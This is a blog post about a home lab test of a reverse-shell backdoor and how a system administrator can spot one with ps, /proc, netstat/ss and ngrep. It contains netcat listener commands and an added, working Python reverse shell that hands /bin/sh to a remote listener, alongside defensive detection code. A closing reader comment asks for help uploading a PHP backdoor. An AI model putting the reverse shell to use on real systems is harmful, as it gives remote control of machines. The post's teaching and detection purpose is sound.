playing with a backdoor

Last night I played with a backdoor shell that I found on the net. Here is how it works and how you, as the system administrator, can find its traces.

I used two VMs (virtual machines), both Debian/Linux: one called "victim", which simulates the cracked server where the backdoor runs, and one called "hacky", where the bad guy is sitting :)

The bad guy's first step is to start a listener on some port (12345) on his own box. A good program for this is netcat; the command looks like: netcat -l -p 12345 (with the OpenBSD flavour of netcat that Debian ships today the port is given without -p: nc -l 12345).

[screenshot: setup]

After compiling the backdoor into an executable on the cracked server ("victim"), the bad guy starts it and it sends a shell home to his box. Note the direction: it is the victim that connects out to the listener (a so-called reverse shell), which is why a firewall that only blocks incoming connections does not stop it.

[screenshot: start the backdoor]

Back at the bad guy's listener we see that the backdoor sends some information about the box, together with the banner of the script's author.

[screenshot: ping from backdoor]

The bad guy can now send any command to the cracked server, for example "hostname", and gets the answer "victim" back.

[screenshot: send hostname]
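The exchange above, both sides, as an added example (this is not the backdoor from the post and not the author's code). It is a minimal Python reverse shell: the "victim" side connects out, sends a banner plus box info, and then hands /bin/sh the socket as stdin/stdout/stderr, which is the same dup2 trick the compiled backdoor does in C. The listener side plays "netcat -l -p 12345", except that it binds an ephemeral loopback port so the demo runs on one machine without touching the network. The banner text and the key=value box info are my own assumptions; the real backdoor prints whatever its author chose.

```python
import os
import platform
import socket
import subprocess
import threading

# Hypothetical banner; the backdoor in the post has its author's banner here.
AUTHOR_BANNER = "-- demo backdoor --"


def box_info():
    """The 'ping' the backdoor sends home before handing over the shell."""
    return (f"{AUTHOR_BANNER}\nhost={platform.node()} uid={os.getuid()} "
            f"os={platform.system()} {platform.release()}\n")


def send_shell_home(host, port):
    """Victim side: connect out to the bad guy's listener, announce the box,
    then start /bin/sh with the socket as stdin/stdout/stderr (Popen dup2()s
    the fd onto 0, 1 and 2 in the child). Returns the shell's exit status."""
    sock = socket.create_connection((host, port))
    sock.sendall(box_info().encode())
    fd = sock.fileno()
    shell = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    status = shell.wait()
    sock.close()          # last reference gone: the listener now sees EOF
    return status


def listener_session(commands):
    """Attacker side, standing in for 'netcat -l -p 12345' on 127.0.0.1:
    wait for the backdoor to call home, type each command, then 'exit',
    and return the whole transcript (banner, box info, command output)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # ephemeral port: no clash with anything
    srv.listen(1)
    port = srv.getsockname()[1]

    # Run the "victim" in a thread so both ends live in this one process.
    victim = threading.Thread(target=send_shell_home, args=("127.0.0.1", port))
    victim.start()

    conn, _ = srv.accept()
    for cmd in commands + ["exit"]:
        conn.sendall((cmd + "\n").encode())
    chunks = []
    while True:                          # read until the shell exits
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    srv.close()
    victim.join()
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(listener_session(["hostname", "uptime"]))
```

Running it prints the banner, the box info and the output of hostname and uptime, exactly the transcript the screenshots show, except that here both ends are the same machine.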

So what can a system administrator do in this case?

First of all, don't panic and pull the plug: volatile traces like the process list and the open network connections are gone the moment you do that.

A good start is to check the process list with something like "ps ax" or "ps fax" (the f draws the process tree, so you also see what started the backdoor). In the screenshot the backdoor process is marked in red.

[screenshot: find backdoor with ps ax]
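ps tells you the process; the next thing you want is which network connection belongs to it, and you want that from somewhere other than the ps binary, which the cracker may have replaced. The following added example (my code, not anything from the post) reads the kernel's own socket table in /proc/net/tcp, maps socket inodes to PIDs by walking /proc/<pid>/fd, and flags established connections owned by a shell, by a binary in /tmp, or by a binary that was deleted after it was started. The sample /proc/net/tcp lines and the addresses 10.0.2.15 (victim) and 10.0.2.22 (bad guy) are constructed for the demo; the port 12345 is the one from the post.

```python
import os
import re
import socket
import struct

# Socket state codes as printed in /proc/net/tcp (include/net/tcp_states.h).
TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "06": "TIME_WAIT", "0A": "LISTEN"}
# Process names that normally have no business holding a network socket.
SHELLS = {"sh", "bash", "dash", "zsh", "nc", "netcat"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def _hex_addr(field):
    """'0100007F:3039' -> ('127.0.0.1', 12345). /proc prints the IPv4
    address as a little-endian 32-bit hex number, the port big-endian."""
    ip_hex, port_hex = field.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the contents of /proc/net/tcp into connection dicts."""
    conns = []
    for line in text.splitlines()[1:]:           # first line is the header
        cols = line.split()
        if len(cols) < 10:
            continue
        conns.append({"local": _hex_addr(cols[1]), "remote": _hex_addr(cols[2]),
                      "state": TCP_STATES.get(cols[3], cols[3]),
                      "uid": int(cols[7]), "inode": int(cols[9])})
    return conns


def socket_owners():
    """Live only (needs root to see other users' fds): map socket inode ->
    (pid, comm, exe) by walking /proc/<pid>/fd. This never runs ps, so a
    trojaned ps does not help the cracker; a kernel rootkit that lies in
    /proc itself still would."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            fds = os.listdir(f"/proc/{pid}/fd")
            comm = open(f"/proc/{pid}/comm").read().strip()
        except OSError:                           # not ours, or already gone
            continue
        try:
            exe = os.readlink(f"/proc/{pid}/exe")   # ends in ' (deleted)' if unlinked
        except OSError:
            exe = "?"
        for fd in fds:
            try:
                m = re.fullmatch(r"socket:\[(\d+)\]", os.readlink(f"/proc/{pid}/fd/{fd}"))
            except OSError:
                continue
            if m:
                owners[int(m.group(1))] = (int(pid), comm, exe)
    return owners


def suspicious_connections(conns, owners):
    """Return (pid, local, remote, reasons) for established connections that
    look like a hand-started backdoor."""
    hits = []
    for c in conns:
        if c["state"] != "ESTABLISHED":
            continue
        pid, comm, exe = owners.get(c["inode"], (None, "?", "?"))
        reasons = []
        if comm in SHELLS:
            reasons.append(f"shell '{comm}' holds a network socket")
        if exe.startswith(SCRATCH_DIRS):
            reasons.append(f"binary runs from {exe}")
        if exe.endswith(" (deleted)"):
            reasons.append("binary was deleted after start")
        if reasons:
            hits.append((pid, c["local"], c["remote"], "; ".join(reasons)))
    return hits


# Constructed sample: sshd listening on 22, and inode 5678 connected out to
# 10.0.2.22:12345 (0x3039). 0F02000A is 10.0.2.15 in little-endian hex.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:8F2C 1602000A:3039 01 00000000:00000000 00:00000000 00000000     0        0 5678 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_OWNERS = {1234: (611, "sshd", "/usr/sbin/sshd"),
                 5678: (4321, "backdoor", "/tmp/backdoor")}

if __name__ == "__main__":
    live = parse_proc_net_tcp(open("/proc/net/tcp").read())
    for pid, local, remote, why in suspicious_connections(live, socket_owners()):
        print(f"pid {pid}: {local[0]}:{local[1]} -> {remote[0]}:{remote[1]}  ({why})")
```

On the real victim the same information is one command away (netstat -tnp or ss -tnp), but those tools rely on the same /proc files, so it is worth knowing what they read and where a rootkit would have to lie.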

We now know the process ID and, from the command line of the process, the IP address and port of the listener on the bad guy's box (if the command line does not give them away, netstat -tnp or ss -tnp shows the established connection together with the PID).

Now it's time for another great program called ngrep. With ngrep you can sniff network traffic in nearly the same way you use grep on files: it matches a regular expression against the payload of every packet. Start ngrep on the port that the backdoor uses, for example: ngrep -d eth0 '' port 12345 (the empty pattern matches everything, the rest is a normal pcap filter).

[screenshot: sniffing with ngrep]

The bad guy sends the command “uptime”.

[screenshot: send uptime]

And the administrator sees the "uptime" request in his ngrep output as well.

[screenshot: ngrep sniffed something]
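What ngrep does here is small enough to write down. The following added example (my code, not ngrep's and not from the post) decodes raw IPv4/TCP packets, keeps the ones on the backdoor's port and greps their payload, which is exactly why the plaintext "uptime" shows up. The "capture" is constructed inline with a tiny packet builder (no checksums, no Ethernet header); the addresses 10.0.2.22 (bad guy) and 10.0.2.15 (victim) and the uptime output are assumptions. The sniff() function at the end reads real frames from a Linux AF_PACKET socket and needs root.

```python
import re
import socket
import struct


def build_ipv4_tcp(src, dst, sport, dport, payload, flags=0x18):
    """Fabricate a minimal IPv4+TCP packet (PSH|ACK, checksums left zero).
    Only used to construct the demo capture below."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, flags, 65535, 0, 0)
    total = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp + payload


def parse_ipv4_tcp(packet):
    """Return (src, sport, dst, dport, payload), or None if not IPv4/TCP."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4          # IP header length, options included
    if packet[9] != 6:                     # protocol 6 = TCP
        return None
    src, dst = socket.inet_ntoa(packet[12:16]), socket.inet_ntoa(packet[16:20])
    tcp = packet[ihl:]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4             # TCP data offset, options included
    return src, sport, dst, dport, tcp[doff:]


def ngrep_like(packets, pattern, port):
    """Emulate `ngrep <pattern> port <port>`: TCP segments on `port` whose
    payload matches the regex, rendered one per line like ngrep's output."""
    rx = re.compile(pattern)
    hits = []
    for pkt in packets:
        parsed = parse_ipv4_tcp(pkt)
        if parsed is None:
            continue
        src, sport, dst, dport, payload = parsed
        if port not in (sport, dport) or not payload:
            continue
        text = payload.decode("latin-1")   # never fails; binary shows up as-is
        if rx.search(text):
            hits.append(f"{src}:{sport} -> {dst}:{dport}  {text.rstrip()!r}")
    return hits


def sniff(pattern, port, iface="eth0", count=20):
    """Linux, root only: grab `count` frames from the wire and grep them.
    AF_PACKET hands over whole Ethernet frames, so strip the 14-byte header."""
    raw = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
    raw.bind((iface, 0))
    frames = [raw.recv(65535)[14:] for _ in range(count)]
    raw.close()
    return ngrep_like(frames, pattern, port)


# Constructed capture: the bad guy types "uptime" into the shell on the
# victim, the victim answers, and an unrelated HTTP request goes out.
CAPTURE = [
    build_ipv4_tcp("10.0.2.22", "10.0.2.15", 12345, 36652, b"uptime\n"),
    build_ipv4_tcp("10.0.2.15", "10.0.2.22", 36652, 12345,
                   b" 21:03:11 up 14 min,  1 user,  load average: 0.00, 0.01, 0.05\n"),
    build_ipv4_tcp("10.0.2.15", "10.0.2.1", 40001, 80, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    for line in ngrep_like(CAPTURE, "uptime", 12345):
        print(line)
```

The reason this works at all is that the backdoor speaks plaintext; the moment the channel is encrypted, the same code (and ngrep) still sees the packets on port 12345, but the payload no longer matches anything useful.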

Yes, this was a very lucky system administrator. In real life crackers use encrypted backdoors, so ngrep shows only garbage, or a rootkit that hides processes or replaces commands like ps. Then you have to compare what ps says with what /proc says, look at the network connections from another box (a switch span port or the firewall logs), or examine the disk after booting from known-good media.


1 comment so far

  1. Dante on

    Nice post,

    Thanks for your post. But the question is how do we upload something like a PHP backdoor using netcat. Is it possible? Please give me examples.
